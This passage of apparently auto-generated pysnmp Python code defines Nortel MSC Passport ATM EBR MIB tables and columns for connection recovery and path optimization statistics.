OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')\nmscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))\nmscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')\nmscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')\nmscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')\nmscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')\nmscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')\nmscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))\nmscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))\nmscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')\nmscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))\nmscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVptVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVptVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), 